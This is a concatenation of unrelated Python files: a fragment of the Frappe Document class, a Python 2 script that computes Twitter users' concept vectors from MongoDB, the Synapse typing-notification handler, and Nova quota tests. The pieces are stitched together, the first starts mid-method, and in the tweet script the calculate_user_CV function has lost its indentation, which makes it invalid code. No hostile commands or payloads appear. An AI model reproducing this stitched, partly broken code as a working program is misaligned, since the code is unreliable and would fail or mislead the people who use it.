			fn = lambda self, *args, **kwargs: getattr(self, method)(*args, **kwargs)
			fn.__name__ = method.encode("utf-8")
			return Document.hook(fn)(self, *args, **kwargs)
	def submit(self):
		"""Set docstatus to 1 (submitted) and save."""
		self.docstatus = 1
		self.save()
	def cancel(self):
		"""Set docstatus to 2 (cancelled) and save."""
		self.docstatus = 2
		self.save()
	def run_before_save_methods(self):
		"""Dispatch the pre-save trigger(s) matching self._action."""
		if getattr(self, "ignore_validate", False):
			return
		if self._action=="save":
			self.run_method("validate")
			self.run_method("before_save")
		elif self._action=="submit":
			self.run_method("validate")
			self.run_method("before_submit")
		elif self._action=="cancel":
			self.run_method("before_cancel")
		elif self._action=="update_after_submit":
			self.run_method("before_update_after_submit")
	def run_post_save_methods(self):
		"""Dispatch the post-save trigger(s) matching self._action."""
		if self._action=="save":
			self.run_method("on_update")
		elif self._action=="submit":
			self.run_method("on_update")
			self.run_method("on_submit")
		elif self._action=="cancel":
			self.run_method("on_cancel")
		elif self._action=="update_after_submit":
			self.run_method("on_update_after_submit")
	@staticmethod
	def hook(f):
		"""Decorate controller method `f` so doc_events handlers from hooks.py
		(for this doctype and for "*") run after it; dict return values are
		merged, others take last-non-None."""
		def add_to_return_value(self, new_return_value):
			# merge dict results, otherwise keep the latest non-empty value
			if isinstance(new_return_value, dict):
				if not self.get("_return_value"):
					self._return_value = {}
				self._return_value.update(new_return_value)
			else:
				self._return_value = new_return_value or self.get("_return_value")
		def compose(fn, *hooks):
			def runner(self, method, *args, **kwargs):
				add_to_return_value(self, fn(self, *args, **kwargs))
				for f in hooks:
					add_to_return_value(self, f(self, method, *args, **kwargs))
				return self._return_value
			return runner
		def composer(self, *args, **kwargs):
			hooks = []
			method = f.__name__
			doc_events = frappe.get_hooks("doc_events", {})
			for handler in doc_events.get(self.doctype, {}).get(method, []) \
				+ doc_events.get("*", {}).get(method, []):
				hooks.append(frappe.get_attr(handler))
			composed = compose(f, *hooks)
			return composed(self, method, *args, **kwargs)
		return composer
	def validate_value(self, fieldname, condition, val2, doc=None, raise_exception=None):
		"""check that value of fieldname should be 'condition' val2
		else throw exception"""
		error_condition_map = {
			"in": _("one of"),
			"not in": _("none of"),
			"^": _("beginning with"),
		}
		if not doc:
			doc = self
		df = doc.meta.get_field(fieldname)
		val1 = doc.get(fieldname)
		# coerce both sides to the field's type before comparing
		if df.fieldtype in ("Currency", "Float"):
			val1 = flt(val1, self.precision(df.fieldname, doc.parentfield or None))
			val2 = flt(val2, self.precision(df.fieldname, doc.parentfield or None))
		elif df.fieldtype in ("Int", "Check"):
			val1 = cint(val1)
			val2 = cint(val2)
		elif df.fieldtype in ("Data", "Text", "Small Text", "Long Text",
			"Text Editor", "Select", "Link"):
			val1 = cstr(val1)
			val2 = cstr(val2)
		if not frappe.compare(val1, condition, val2):
			label = doc.meta.get_label(fieldname)
			condition_str = error_condition_map.get(condition, condition)
			# NOTE(review): _("...".format(...)) translates the already-formatted
			# string; _("...").format(...) is likely intended — confirm
			if doc.parentfield:
				msg = _("Incorrect value in row {0}: {1} must be {2} {3}".format(doc.idx, label, condition_str, val2))
			else:
				msg = _("Incorrect value: {1} must be {2} {3}".format(label, condition_str, val2))
			# raise passed exception or True
			msgprint(msg, raise_exception=raise_exception or True)
	def validate_table_has_rows(self, parentfield, raise_exception=None):
		"""Throw (EmptyTableError by default) if the child table has no rows."""
		if not (isinstance(self.get(parentfield), list) and len(self.get(parentfield)) > 0):
			label = self.meta.get_label(parentfield)
			frappe.throw(_("Table {0} cannot be empty").format(label), raise_exception or frappe.EmptyTableError)
	def round_floats_in(self, doc, fieldnames=None):
		"""Round Currency/Float fields of `doc` to their configured precision."""
		if not fieldnames:
			fieldnames = (df.fieldname for df in
				doc.meta.get("fields", {"fieldtype": ["in", ["Currency", "Float"]]}))
		for fieldname in fieldnames:
			doc.set(fieldname, flt(doc.get(fieldname), self.precision(fieldname, doc.parentfield)))
	def precision(self, fieldname, parentfield=None):
		"""Return (and cache) the decimal precision for a field.

		Currency fields may derive precision from their currency options;
		Float fields use the system default (float_precision, fallback 3).
		"""
		from frappe.model.meta import get_field_precision
		if parentfield and not isinstance(parentfield, basestring):
			parentfield = parentfield.parentfield
		if not hasattr(self, "_precision"):
			# lazy per-document cache: {"default": n, "options": {}, <parentfield>: {...}}
			self._precision = frappe._dict({
				"default": cint(frappe.db.get_default("float_precision")) or 3,
				"options": {}
			})
		if self._precision.setdefault(parentfield or "main", {}).get(fieldname) is None:
			meta = frappe.get_meta(self.meta.get_field(parentfield).options if parentfield else self.doctype)
			df = meta.get_field(fieldname)
			if df.fieldtype == "Currency" and df.options and not self._precision.options.get(df.options):
				self._precision.options[df.options] = get_field_precision(df, self)
			if df.fieldtype == "Currency":
				self._precision[parentfield or "main"][fieldname] = cint(self._precision.options.get(df.options)) or \
					self._precision.default
			elif df.fieldtype == "Float":
				self._precision[parentfield or "main"][fieldname] = self._precision.default
		return self._precision[parentfield or "main"][fieldname]
|
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
go through user cleaned monthly tweets (MO_tweets.dat) and create user monthly CVs (MO_CV.json)
need access to MongoDB for individual word CVs. Both, input and output are .json txt files.
"""
import sys, io, json, os
import pymongo
from pymongo import MongoClient
from nltk.stem.snowball import SnowballStemmer
from collections import defaultdict, OrderedDict
import math
import codecs
import logging
import traceback
import multiprocessing
import functools
from itertools import repeat
import numpy as np
# used for our Wiki SR database querying. We saved CVs for stemmed words for better accuracy.
STEMMER = SnowballStemmer("english", ignore_stopwords=True )
# working directory with the monthly tweet files
IN_DIR = "../../../DATA/General/"
# Mongo collections; rebound to real collection handles by set_global_conn_params()
CV = ""
AID7s = ""
# this global dictionary is reloaded for each month MO
USR_TWEETS = defaultdict(int)
# .json input and output file-name suffixes (prefixed by the month number)
F_IN_NAME = "_tweets.dat"
F_OUT_CV_NAME = "_CV.json"
# module-level cache of word -> concept vector,
# so to reduce the number of queries to MongoDB
words_CVs_lst = defaultdict(int)
#############################################################################################
# take the right collection = TF-IDF based concept vectors (CV) based on Wiki
#############################################################################################
def set_global_conn_params(client=None, dbs="test", CV_collection="CV_stemmed_pruned",
                            aid_collection="AID"):
    """Bind the module-level Mongo collection handles CV and AID7s.

    The original signature used ``client=MongoClient()``, which Python
    evaluates once at import time — opening a Mongo connection even when
    the caller supplies its own client.  Defaulting to None and building
    the client inside the function keeps the same behaviour but connects
    lazily.  Returns (CV, AID7s) for convenience/testability.
    """
    global CV, AID7s
    if client is None:
        client = MongoClient()
    # connect to Mongo db (default: "test")
    db = client[dbs]
    CV = db[CV_collection]
    AID7s = db[aid_collection]
    return CV, AID7s
#############################################################################################
# read in monthly user tweets from the right file (one per each month,
# created by ""monthly_user_tweets_clean_2_json.py)
#############################################################################################
def read_in_monthly_user_tweets(MO):
    """Load one month's cleaned tweets into the global USR_TWEETS dict.

    Reads <MO>_tweets.dat (one JSON object per line with keys "_id",
    "txt", "count") and stores, per user, the tweet word-frequency data
    and the tweet count.
    """
    f = codecs.open(str(MO) + F_IN_NAME, "r")
    for line in f:
        line7s = json.loads(line)
        user = line7s["_id"]
        tweets_text = line7s["txt"]
        count = line7s["count"]
        # one nested dict per user: {"text": [...], "count": n}
        USR_TWEETS[user] = defaultdict(int)
        USR_TWEETS[user]["text"] = tweets_text
        USR_TWEETS[user]["count"] = count
    f.close()
def stem_word(token):
    """Return the Snowball (English) stem of a single token."""
    return STEMMER.stem(token)
# given two vectors as dictionaries with *ANY* sets of keys
# return their cosine similarity *vectors may be of ANY dim*
# cosine sim (v1,v2) = v1.v2 / ||v1|| ||v2||
def cosine_2_vectors(v1, v2):
    """Cosine similarity of two sparse vectors stored as {key: weight} dicts."""
    # the dot product only involves keys present in both vectors
    shared_keys = set(v1) & set(v2)
    dot_product = 0.0
    for key in shared_keys:
        dot_product += v1[key] * v2[key]
    # each squared norm runs over *all* keys of its own vector
    sq_norm_1 = 0.0
    for weight in v1.values():
        sq_norm_1 += weight * weight
    sq_norm_2 = 0.0
    for weight in v2.values():
        sq_norm_2 += weight * weight
    denominator = math.sqrt(sq_norm_1 * sq_norm_2)
    try:
        return dot_product / denominator
    except ZeroDivisionError:
        # at least one vector is empty or all-zero
        return 0
# extract the CV vector in the form for calculation with true ids for articles
def extract_word_CV(w):
    """Fetch the concept vector of word `w` from the Mongo CV collection.

    Returns {article_id: tf_idf} or None if the (stemmed) word has no CV.
    # NOTE(review): assumes each stored CV entry is a dict whose values are
    # (tf_idf, article_id) pairs — confirm against the collection schema.
    """
    vec = defaultdict(int)
    w = stem_word(w)
    cv = CV.find_one({"_id": w})
    if cv == None:
        return None
    v = cv['CV']
    if v == None:
        return None
    for el in v: # can code better this part ?
        for key, value in el.iteritems():
            # value[1] is the article id, value[0] its tf-idf score
            vec[value[1]] = float(value[0])
    #return OrderedDict(sorted(vec.items(), key=lambda x: x[1], reverse= False))
    return vec
# this function outputs a dictionary with {stemmed(word): fq} pairs
def stem_text_corpus(txt):
    """Collapse a list of {word: fq} dicts into a single {stem: total_fq} dict."""
    fq_by_stem = defaultdict(int)
    for word_fqs in txt:
        for word, fq in word_fqs.iteritems():
            fq_by_stem[stem_word(word)] += int(fq)
    return fq_by_stem
# for given user, if a word in his text is in the global cached words_CVs_lst, take it,
# otherwise extract from MongoDB and add to the global cache; and then calculate his CV
def calculate_user_CV(userA):
# from read in users cleaned tweets with frequencies
A = USR_TWEETS[userA]
#print A
txtA = A['text']
num_tweets = A['count']
txt_fq_dist = stem_text_corpus(txtA)
CV_txt = defaultdict(int)
for word, fq in txt_fq_dist.iteritems():
# simple code
if words_CVs_lst[word]:
cv_word = words_CVs_lst[word]
else:
# expensive step going to Mongo
cv_word = extract_word_CV(word)
words_CVs_lst[word] = cv_word
if cv_word:
for concept, tf_idf in cv_word.iteritems():
CV_txt[concept] += tf_idf * fq
if not CV_txt or not CV_txt.values():
print userA
return OrderedDict(sorted(CV_txt.items(), key=lambda x: x[1], reverse= True)), num_tweets #normalize -- will do in the pruning step
# we prune CVs according to the original algorithms and save them to the given f output file
def prune_CV_and_dump(userA, num_tweets, CV_userA, f, threshold = 0.005, window = 100):
    """Prune userA's (score-sorted) concept vector and append it to file f.

    Walks the concepts in descending score order; after the first `window`
    entries, stops as soon as the score drop across the trailing window
    falls below `threshold` * top score.  Writes one JSON object per user.
    # NOTE(review): N and CNT are computed but unused; chck_pruning is only
    # accumulated locally — presumably leftover instrumentation.
    """
    N = len(CV_userA.items())
    CNT = 0
    chck_pruning = 0
    CV_dict = {}
    CV_dict['_id'] = userA
    CV_dict['num_tweets'] = num_tweets
    CV_dict['CV'] = []
    vec = CV_userA.values()
    # HOWTO take the first element from OrderedDict already
    if not vec:
        return
    # CV_userA is sorted descending, so the max is the first/top score
    highest_scoring_concept = max(vec)
    highest_scoring_concept_pct = highest_scoring_concept * threshold
    remembered_tfidf = highest_scoring_concept
    remembered_id = 0
    k = 0
    for (concept, tfidf) in CV_userA.iteritems():
        CNT += 1
        k += 1
        tfidf_dict = {}
        tfidf_dict[concept] = str(tfidf)
        CV_dict['CV'].append(tfidf_dict)
        if k >= window:
            # stop when scores have flattened out relative to the top score
            if remembered_tfidf - tfidf < highest_scoring_concept_pct:
                chck_pruning += (len(CV_userA.items()) - k)
                break
            else:
                # slide the reference score one position down the sorted list
                remembered_id += 1
                remembered_tfidf = np.sort(vec)[::-1][remembered_id]
    CV_new = OrderedDict(sorted(CV_dict.items(), key=lambda x: x[1], reverse= False))
    f.write(unicode(json.dumps(CV_new, ensure_ascii=False)) + '\n')
if __name__ == "__main__":
    # connect to Mongo and move into the data directory
    set_global_conn_params()
    os.chdir(IN_DIR)
    ss = 0
    # go for all the 7 months we have the data for
    # May until Nov (currently only month 10 is processed)
    for MO in [10]:
        read_in_monthly_user_tweets(MO)
        print "read in ", str(MO)
        with codecs.open(str(MO) + F_OUT_CV_NAME, 'w', encoding='utf-8') as f:
            for userA in USR_TWEETS:
                # NOTE(review): printing every user is very noisy; the
                # ss % 1000 progress print below probably suffices
                print userA
                ss += 1
                if ss % 1000 == 0:
                    print ss, userA
                CV_userA, num_tweets = calculate_user_CV(userA)
                #print CV_userA, num_tweets
                prune_CV_and_dump(userA, num_tweets, CV_userA, f, threshold = 0.005, window = 100)
        # NOTE(review): redundant — the with-statement already closed f
        f.close()
|
|
# -*- coding: utf-8 -*-
# Copyright 2014, 2015 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from twisted.internet import defer
from ._base import BaseHandler
from synapse.api.errors import SynapseError, AuthError
from synapse.util.logcontext import PreserveLoggingContext
from synapse.types import UserID
import logging
from collections import namedtuple
logger = logging.getLogger(__name__)
# A tiny immutable object useful for storing a user's membership in a room,
# used as a mapping key in the typing-state dicts below
RoomMember = namedtuple("RoomMember", ("room_id", "user"))
class TypingNotificationHandler(BaseHandler):
    """Tracks which users are currently typing in which rooms and fans that
    state out to local clients (via the notifier) and to remote servers
    (via m.typing EDUs over federation).

    # NOTE(review): methods below use self.hs / self.auth / self.notifier,
    # which are not set here — presumably provided by BaseHandler; confirm.
    """
    def __init__(self, hs):
        super(TypingNotificationHandler, self).__init__(hs)
        self.homeserver = hs
        self.clock = hs.get_clock()
        self.federation = hs.get_replication_layer()
        self.federation.register_edu_handler("m.typing", self._recv_edu)
        hs.get_distributor().observe("user_left_room", self.user_left_room)
        self._member_typing_until = {} # clock time we expect to stop
        self._member_typing_timer = {} # deferreds to manage the above
        # map room IDs to serial numbers
        self._room_serials = {}
        self._latest_room_serial = 0
        # map room IDs to sets of users currently typing
        self._room_typing = {}
    def tearDown(self):
        """Cancels all the pending timers.
        Normally this shouldn't be needed, but it's required from unit tests
        to avoid a "Reactor was unclean" warning."""
        for t in self._member_typing_timer.values():
            self.clock.cancel_call_later(t)
    @defer.inlineCallbacks
    def started_typing(self, target_user, auth_user, room_id, timeout):
        """Mark target_user as typing in room_id for `timeout` ms.

        Only a local user may set their own state.  Re-arms the expiry
        timer; only pushes an update if the user was not already typing.
        """
        if not self.hs.is_mine(target_user):
            raise SynapseError(400, "User is not hosted on this Home Server")
        if target_user != auth_user:
            raise AuthError(400, "Cannot set another user's typing state")
        yield self.auth.check_joined_room(room_id, target_user.to_string())
        logger.debug(
            "%s has started typing in %s", target_user.to_string(), room_id
        )
        until = self.clock.time_msec() + timeout
        member = RoomMember(room_id=room_id, user=target_user)
        was_present = member in self._member_typing_until
        # replace any existing expiry timer with a fresh one
        if member in self._member_typing_timer:
            self.clock.cancel_call_later(self._member_typing_timer[member])
        def _cb():
            logger.debug(
                "%s has timed out in %s", target_user.to_string(), room_id
            )
            self._stopped_typing(member)
        self._member_typing_until[member] = until
        self._member_typing_timer[member] = self.clock.call_later(
            timeout / 1000.0, _cb
        )
        if was_present:
            # No point sending another notification
            defer.returnValue(None)
        yield self._push_update(
            room_id=room_id,
            user=target_user,
            typing=True,
        )
    @defer.inlineCallbacks
    def stopped_typing(self, target_user, auth_user, room_id):
        """Explicitly clear target_user's typing state in room_id."""
        if not self.hs.is_mine(target_user):
            raise SynapseError(400, "User is not hosted on this Home Server")
        if target_user != auth_user:
            raise AuthError(400, "Cannot set another user's typing state")
        yield self.auth.check_joined_room(room_id, target_user.to_string())
        logger.debug(
            "%s has stopped typing in %s", target_user.to_string(), room_id
        )
        member = RoomMember(room_id=room_id, user=target_user)
        # cancel the pending expiry timer, if any
        if member in self._member_typing_timer:
            self.clock.cancel_call_later(self._member_typing_timer[member])
            del self._member_typing_timer[member]
        yield self._stopped_typing(member)
    @defer.inlineCallbacks
    def user_left_room(self, user, room_id):
        """Distributor callback: leaving a room clears local typing state."""
        if self.hs.is_mine(user):
            member = RoomMember(room_id=room_id, user=user)
            yield self._stopped_typing(member)
    @defer.inlineCallbacks
    def _stopped_typing(self, member):
        """Internal: clear `member`'s typing state and push an update."""
        if member not in self._member_typing_until:
            # No point
            defer.returnValue(None)
        yield self._push_update(
            room_id=member.room_id,
            user=member.user,
            typing=False,
        )
        del self._member_typing_until[member]
        if member in self._member_typing_timer:
            # Don't cancel it - either it already expired, or the real
            # stopped_typing() will cancel it
            del self._member_typing_timer[member]
    @defer.inlineCallbacks
    def _push_update(self, room_id, user, typing):
        """Push a typing change to local listeners and remote homeservers."""
        localusers = set()
        remotedomains = set()
        rm_handler = self.homeserver.get_handlers().room_member_handler
        yield rm_handler.fetch_room_distributions_into(
            room_id, localusers=localusers, remotedomains=remotedomains
        )
        if localusers:
            self._push_update_local(
                room_id=room_id,
                user=user,
                typing=typing
            )
        # fan out one m.typing EDU per remote domain in the room
        deferreds = []
        for domain in remotedomains:
            deferreds.append(self.federation.send_edu(
                destination=domain,
                edu_type="m.typing",
                content={
                    "room_id": room_id,
                    "user_id": user.to_string(),
                    "typing": typing,
                },
            ))
        yield defer.DeferredList(deferreds, consumeErrors=True)
    @defer.inlineCallbacks
    def _recv_edu(self, origin, content):
        """Federation callback: apply a remote m.typing EDU locally."""
        room_id = content["room_id"]
        user = UserID.from_string(content["user_id"])
        localusers = set()
        rm_handler = self.homeserver.get_handlers().room_member_handler
        yield rm_handler.fetch_room_distributions_into(
            room_id, localusers=localusers
        )
        if localusers:
            self._push_update_local(
                room_id=room_id,
                user=user,
                typing=content["typing"]
            )
    def _push_update_local(self, room_id, user, typing):
        """Update the per-room typing set, bump serials, wake the notifier."""
        if room_id not in self._room_serials:
            self._room_serials[room_id] = 0
            self._room_typing[room_id] = set()
        room_set = self._room_typing[room_id]
        if typing:
            room_set.add(user)
        elif user in room_set:
            room_set.remove(user)
        # serials let stream consumers detect which rooms changed since a key
        self._latest_room_serial += 1
        self._room_serials[room_id] = self._latest_room_serial
        with PreserveLoggingContext():
            self.notifier.on_new_user_event(
                "typing_key", self._latest_room_serial, rooms=[room_id]
            )
class TypingNotificationEventSource(object):
    """Event source exposing m.typing events to the event streams."""
    def __init__(self, hs):
        self.hs = hs
        # Both handlers are resolved lazily to avoid a circular dependency
        # during homeserver setup.
        self._handler = None
        self._room_member_handler = None
    def handler(self):
        # Avoid cyclic dependency in handler setup
        if not self._handler:
            self._handler = self.hs.get_handlers().typing_notification_handler
        return self._handler
    def room_member_handler(self):
        if not self._room_member_handler:
            self._room_member_handler = self.hs.get_handlers().room_member_handler
        return self._room_member_handler
    def _make_event_for(self, room_id):
        """Build an m.typing event listing everyone typing in room_id."""
        currently_typing = self.handler()._room_typing[room_id]
        return {
            "type": "m.typing",
            "room_id": room_id,
            "content": {
                "user_ids": [member.to_string() for member in currently_typing],
            },
        }
    @defer.inlineCallbacks
    def get_new_events_for_user(self, user, from_key, limit):
        from_key = int(from_key)
        handler = self.handler()
        joined_room_ids = (
            yield self.room_member_handler().get_joined_rooms_for_user(user)
        )
        # One event per joined room whose typing state changed after from_key.
        events = [
            self._make_event_for(room_id)
            for room_id in handler._room_serials
            if room_id in joined_room_ids
            and handler._room_serials[room_id] > from_key
        ]
        defer.returnValue((events, handler._latest_room_serial))
    def get_current_key(self):
        return self.handler()._latest_room_serial
    def get_pagination_rows(self, user, pagination_config, key):
        # Typing notifications are ephemeral; there is no history to page.
        return ([], pagination_config.from_key)
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
from oslo.config import cfg
from nova import compute
from nova.compute import instance_types
from nova import context
from nova import db
from nova.db.sqlalchemy import api as sqa_api
from nova.db.sqlalchemy import models as sqa_models
from nova import exception
from nova.openstack.common import rpc
from nova.openstack.common import timeutils
from nova import quota
from nova.scheduler import driver as scheduler_driver
from nova import test
import nova.tests.image.fake
CONF = cfg.CONF
# pull in options declared by other modules that these tests read
CONF.import_opt('scheduler_topic', 'nova.scheduler.rpcapi')
CONF.import_opt('compute_driver', 'nova.virt.driver')
class QuotaIntegrationTestCase(test.TestCase):
    """End-to-end checks that the compute/network APIs enforce quotas."""

    def setUp(self):
        super(QuotaIntegrationTestCase, self).setUp()
        # Deliberately tiny limits so each test below can trip them cheaply.
        self.flags(compute_driver='nova.virt.fake.FakeDriver',
                   quota_instances=2,
                   quota_cores=4,
                   quota_floating_ips=1,
                   network_manager='nova.network.manager.FlatDHCPManager')
        # Apparently needed by the RPC tests...
        self.network = self.start_service('network')
        self.user_id = 'admin'
        self.project_id = 'admin'
        self.context = context.RequestContext(self.user_id,
                                              self.project_id,
                                              is_admin=True)
        orig_rpc_call = rpc.call

        def rpc_call_wrapper(context, topic, msg, timeout=None):
            """Stub out the scheduler creating the instance entry."""
            if (topic == CONF.scheduler_topic and
                    msg['method'] == 'run_instance'):
                scheduler = scheduler_driver.Scheduler
                instance = scheduler().create_instance_db_entry(
                    context,
                    msg['args']['request_spec'],
                    None)
                return [scheduler_driver.encode_instance(instance)]
            else:
                # Everything else goes through to the real RPC layer.
                return orig_rpc_call(context, topic, msg)

        self.stubs.Set(rpc, 'call', rpc_call_wrapper)
        nova.tests.image.fake.stub_out_image_service(self.stubs)

    def tearDown(self):
        super(QuotaIntegrationTestCase, self).tearDown()
        nova.tests.image.fake.FakeImageService_reset()

    def _create_instance(self, cores=2):
        """Create a test instance."""
        inst = {}
        inst['image_id'] = 'cedef40a-ed67-4d10-800e-17455edce175'
        inst['reservation_id'] = 'r-fakeres'
        inst['user_id'] = self.user_id
        inst['project_id'] = self.project_id
        inst['instance_type_id'] = '3'  # m1.large
        inst['vcpus'] = cores
        return db.instance_create(self.context, inst)

    def test_too_many_instances(self):
        # Fill the quota (2 instances), then one more create must fail.
        instance_uuids = []
        for i in range(CONF.quota_instances):
            instance = self._create_instance()
            instance_uuids.append(instance['uuid'])
        inst_type = instance_types.get_instance_type_by_name('m1.small')
        image_uuid = 'cedef40a-ed67-4d10-800e-17455edce175'
        self.assertRaises(exception.QuotaError, compute.API().create,
                          self.context,
                          min_count=1,
                          max_count=1,
                          instance_type=inst_type,
                          image_href=image_uuid)
        for instance_uuid in instance_uuids:
            db.instance_destroy(self.context, instance_uuid)

    def test_too_many_cores(self):
        # A single instance consumes all 4 cores allowed by quota_cores.
        instance = self._create_instance(cores=4)
        inst_type = instance_types.get_instance_type_by_name('m1.small')
        image_uuid = 'cedef40a-ed67-4d10-800e-17455edce175'
        self.assertRaises(exception.QuotaError, compute.API().create,
                          self.context,
                          min_count=1,
                          max_count=1,
                          instance_type=inst_type,
                          image_href=image_uuid)
        db.instance_destroy(self.context, instance['uuid'])

    def test_too_many_addresses(self):
        # quota_floating_ips=1 and one IP already exists for the project.
        address = '192.168.0.100'
        db.floating_ip_create(context.get_admin_context(),
                              {'address': address,
                               'project_id': self.project_id})
        self.assertRaises(exception.QuotaError,
                          self.network.allocate_floating_ip,
                          self.context,
                          self.project_id)
        db.floating_ip_destroy(context.get_admin_context(), address)

    def test_auto_assigned(self):
        address = '192.168.0.100'
        db.floating_ip_create(context.get_admin_context(),
                              {'address': address,
                               'project_id': self.project_id})
        # auto allocated addresses should not be counted
        self.assertRaises(exception.NoMoreFloatingIps,
                          self.network.allocate_floating_ip,
                          self.context,
                          self.project_id,
                          True)
        db.floating_ip_destroy(context.get_admin_context(), address)

    def test_too_many_metadata_items(self):
        # One item past quota_metadata_items must be rejected.
        metadata = {}
        for i in range(CONF.quota_metadata_items + 1):
            metadata['key%s' % i] = 'value%s' % i
        inst_type = instance_types.get_instance_type_by_name('m1.small')
        image_uuid = 'cedef40a-ed67-4d10-800e-17455edce175'
        self.assertRaises(exception.QuotaError, compute.API().create,
                          self.context,
                          min_count=1,
                          max_count=1,
                          instance_type=inst_type,
                          image_href=image_uuid,
                          metadata=metadata)

    def _create_with_injected_files(self, files):
        """Attempt a create carrying ``files`` as injected files."""
        api = compute.API()
        inst_type = instance_types.get_instance_type_by_name('m1.small')
        image_uuid = 'cedef40a-ed67-4d10-800e-17455edce175'
        api.create(self.context, min_count=1, max_count=1,
                   instance_type=inst_type, image_href=image_uuid,
                   injected_files=files)

    def test_no_injected_files(self):
        api = compute.API()
        inst_type = instance_types.get_instance_type_by_name('m1.small')
        image_uuid = 'cedef40a-ed67-4d10-800e-17455edce175'
        api.create(self.context,
                   instance_type=inst_type,
                   image_href=image_uuid)

    def test_max_injected_files(self):
        # Exactly at the limit: allowed.
        files = []
        for i in xrange(CONF.quota_injected_files):
            files.append(('/my/path%d' % i, 'config = test\n'))
        self._create_with_injected_files(files)  # no QuotaError

    def test_too_many_injected_files(self):
        files = []
        for i in xrange(CONF.quota_injected_files + 1):
            files.append(('/my/path%d' % i, 'my\ncontent%d\n' % i))
        self.assertRaises(exception.QuotaError,
                          self._create_with_injected_files, files)

    def test_max_injected_file_content_bytes(self):
        max = CONF.quota_injected_file_content_bytes
        content = ''.join(['a' for i in xrange(max)])
        files = [('/test/path', content)]
        self._create_with_injected_files(files)  # no QuotaError

    def test_too_many_injected_file_content_bytes(self):
        max = CONF.quota_injected_file_content_bytes
        content = ''.join(['a' for i in xrange(max + 1)])
        files = [('/test/path', content)]
        self.assertRaises(exception.QuotaError,
                          self._create_with_injected_files, files)

    def test_max_injected_file_path_bytes(self):
        max = CONF.quota_injected_file_path_bytes
        path = ''.join(['a' for i in xrange(max)])
        files = [(path, 'config = quotatest')]
        self._create_with_injected_files(files)  # no QuotaError

    def test_too_many_injected_file_path_bytes(self):
        max = CONF.quota_injected_file_path_bytes
        path = ''.join(['a' for i in xrange(max + 1)])
        files = [(path, 'config = quotatest')]
        self.assertRaises(exception.QuotaError,
                          self._create_with_injected_files, files)

    def test_reservation_expire(self):
        self.useFixture(test.TimeOverride())

        def assertInstancesReserved(reserved):
            result = quota.QUOTAS.get_project_quotas(self.context,
                                                     self.context.project_id)
            self.assertEqual(result['instances']['reserved'], reserved)

        quota.QUOTAS.reserve(self.context,
                             expire=60,
                             instances=2)
        assertInstancesReserved(2)
        # Jump past the 60 s expiry; the reservation should be released.
        timeutils.advance_time_seconds(80)
        result = quota.QUOTAS.expire(self.context)
        assertInstancesReserved(0)
class FakeContext(object):
    """Minimal stand-in for a request context used by the quota tests."""

    def __init__(self, project_id, quota_class):
        # Non-admin by default; elevated() produces the admin variant.
        self.project_id = project_id
        self.quota_class = quota_class
        self.user_id = 'fake_user'
        self.is_admin = False

    def elevated(self):
        """Return a copy of this context with admin rights enabled."""
        admin_ctx = self.__class__(self.project_id, self.quota_class)
        admin_ctx.is_admin = True
        return admin_ctx
class FakeDriver(object):
    """Quota-driver test double that records every call it receives.

    Each method appends a tuple of its own name and arguments to
    ``called`` so tests can assert on the exact sequence of driver
    calls.  Lookups are served from the ``by_project``/``by_class``
    mappings, and ``reserve`` always hands back the canned
    ``reservations`` list.
    """

    def __init__(self, by_project=None, by_class=None, reservations=None):
        self.called = []
        self.by_project = by_project if by_project else {}
        self.by_class = by_class if by_class else {}
        self.reservations = reservations if reservations else []

    def _record(self, *call):
        # Internal: remember one driver invocation for later assertions.
        self.called.append(call)

    def get_by_project(self, context, project_id, resource):
        self._record('get_by_project', context, project_id, resource)
        project_quotas = self.by_project.get(project_id, {})
        if resource not in project_quotas:
            raise exception.ProjectQuotaNotFound(project_id=project_id)
        return project_quotas[resource]

    def get_by_class(self, context, quota_class, resource):
        self._record('get_by_class', context, quota_class, resource)
        class_quotas = self.by_class.get(quota_class, {})
        if resource not in class_quotas:
            raise exception.QuotaClassNotFound(class_name=quota_class)
        return class_quotas[resource]

    def get_defaults(self, context, resources):
        self._record('get_defaults', context, resources)
        return resources

    def get_class_quotas(self, context, resources, quota_class,
                         defaults=True):
        self._record('get_class_quotas', context, resources,
                     quota_class, defaults)
        return resources

    def get_project_quotas(self, context, resources, project_id,
                           quota_class=None, defaults=True, usages=True):
        self._record('get_project_quotas', context, resources,
                     project_id, quota_class, defaults, usages)
        return resources

    def limit_check(self, context, resources, values, project_id=None):
        self._record('limit_check', context, resources,
                     values, project_id)

    def reserve(self, context, resources, deltas, expire=None,
                project_id=None):
        self._record('reserve', context, resources, deltas,
                     expire, project_id)
        return self.reservations

    def commit(self, context, reservations, project_id=None):
        self._record('commit', context, reservations, project_id)

    def rollback(self, context, reservations, project_id=None):
        self._record('rollback', context, reservations, project_id)

    def usage_reset(self, context, resources):
        self._record('usage_reset', context, resources)

    def destroy_all_by_project(self, context, project_id):
        self._record('destroy_all_by_project', context, project_id)

    def expire(self, context):
        self._record('expire', context)
class BaseResourceTestCase(test.TestCase):
    """Unit tests for quota.BaseResource default/override resolution."""

    def test_no_flag(self):
        # Without a backing config flag the default limit is unlimited (-1).
        resource = quota.BaseResource('test_resource')
        self.assertEqual(resource.name, 'test_resource')
        self.assertEqual(resource.flag, None)
        self.assertEqual(resource.default, -1)

    def test_with_flag(self):
        # We know this flag exists, so use it...
        self.flags(quota_instances=10)
        resource = quota.BaseResource('test_resource', 'quota_instances')
        self.assertEqual(resource.name, 'test_resource')
        self.assertEqual(resource.flag, 'quota_instances')
        self.assertEqual(resource.default, 10)

    def test_with_flag_no_quota(self):
        # Flag explicitly set to -1 keeps the unlimited default.
        self.flags(quota_instances=-1)
